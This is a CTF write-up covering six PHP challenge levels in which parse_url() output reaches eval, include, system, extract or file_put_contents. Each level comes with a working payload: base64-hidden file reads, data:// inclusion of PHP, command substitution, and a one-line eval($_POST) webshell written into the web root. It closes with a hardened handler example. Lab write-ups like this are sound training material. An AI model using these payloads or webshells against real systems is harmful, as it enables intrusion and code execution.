CTFSHOW Weekend Challenge
Level 1
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-10 10:58:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
eval($data['host']);
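This level allows direct command execution.
At first my idea was to use ?u=aa://echo(`ls`); for command execution, but I found that when trying to read the flag in the root directory the input was automatically truncated, so the command could not run properly.
After reading the official writeup, I found that base64 can be used to get around ls / being truncated.
payload: ?u=aa://system(base64_decode('Y2F0IC9mKg=='));
Level 2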
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:25:53
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
include $data['host'].$data['path'];
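Here we can see that file inclusion is used to get the flag; host and path are concatenated.
We can use a PHP pseudo-protocol.
payload: ?u=https://data:://text/plain;base64,PD9waHAKc3lzdGVtKCdjYXQgL19mMWFnXzFzX2gzcmUudHh0Jyk7Cj8%2B
(Here the + in the base64-encoded string needs to be URL-encoded; special characters in a URL must be encoded.)
Level 3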
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
include $data['scheme'].$data['path'];
The same idea applies here; we use a PHP pseudo-protocol.
payload: ?u=data:://text/plain;base64,PD9waHAKc3lzdGVtKCdjYXQgL19mMWFfZ18xc19oM3JlJyk7Cj8%2B
Level 4
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:35
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
system($data['host']);
Payload for this level: ?u=user://`echo 'Y2F0IC8xX2YxYWdfMXNfaDNyZQog'|base64 -d`
Level 5
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
extract(parse_url($_GET['u']));
include $$$$$$host;
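The point being tested in this level is variable overwriting.
payload: ?u=user://pass:query@scheme/?fragment%23data://text/plain,<?php system('cat /_f1ag_1s_h3ree');?>
This one is fairly simple, so I won't describe it in detail: it is variable overwriting, and what finally gets executed is the data pseudo-protocol, which retrieves the flag.
Level 6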
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
file_put_contents($data['path'], $data['host']);
The file_put_contents function writes a one-line webshell into 1.php.
So the payload is: ?u=ctfshow://<script language='php'>eval($_POST[1]);/var/www/html/1.php
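
All six levels hand parse_url() output directly to eval, include, system or file_put_contents. The following is an added example, not part of the original write-up or the challenge code: a hardened handler that keeps the parsed components in an array, checks them against fixed lists, and never passes them to those sinks. The allow-list values, page map and function names are assumptions for illustration.

```php
<?php
// Added example: allow-list values and function names are assumptions.
// parse_url() only splits a string; it validates nothing, so every
// component it returns is still attacker-controlled input.
const ALLOWED_SCHEMES = ['https'];
const ALLOWED_HOSTS   = ['static.example.com'];
const PAGES           = ['home' => 'pages/home.php', 'about' => 'pages/about.php'];

// Returns the parsed components, or null if the URL is not allow-listed.
function validate_url(string $raw): ?array
{
    $parts = parse_url($raw);   // false on seriously malformed input
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    // Keep the result in an array: extract() would let the URL create or
    // overwrite $scheme, $host, $user, $pass, $query and $fragment.
    if (!in_array(strtolower($parts['scheme']), ALLOWED_SCHEMES, true)
        || !in_array(strtolower($parts['host']), ALLOWED_HOSTS, true)) {
        return null;
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;            // userinfo is never needed here
    }
    return $parts;
}

// include targets come from a fixed map keyed by a short name, never from
// URL components. Keeping allow_url_include off (the PHP default) also
// stops include from accepting data:// and http:// targets.
function resolve_page(string $key): ?string
{
    return PAGES[$key] ?? null;
}

// Constructed inputs shaped like the URLs in the levels above (no payloads).
$samples = [
    'https://static.example.com/logo.png',
    'aa://not-a-hostname();',
    'data:://text/plain;base64,AAAA',
    'user://pass:query@scheme/?fragment#x',
];
foreach ($samples as $u) {
    printf("%-40s %s\n", $u, validate_url($u) === null ? 'rejected' : 'accepted');
}
var_dump(resolve_page('home'), resolve_page('../../etc/passwd'));
```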